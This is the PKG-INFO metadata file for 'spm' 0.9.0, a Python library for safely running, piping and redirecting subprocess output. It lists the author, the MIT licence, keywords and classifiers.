Metadata-Version: 1.1
Name: spm
Version: 0.9.0
Summary: SubProcess Manager provides a simple programming interface to safely run, pipe and redirect output of subprocesses.
Home-page: https://github.com/acatton/python-spm
Author: Antoine Catton
Author-email: devel at antoine dot catton dot fr
License: MIT
Keywords: api exec execute fork output pipe process processes redirect safe sh shell subprocess
Platform: UNKNOWN
Classifier: Development Status :: 4 - Beta
Classifier: Environment :: Console
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: System Administrators
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: POSIX
Classifier: Programming Language :: Python :: 2.7
Classifier: Programming Language :: Python :: 3.3
Classifier: Programming Language :: Python :: 3.4
Classifier: Programming Language :: Unix Shell
Classifier: Topic :: System :: System Shells
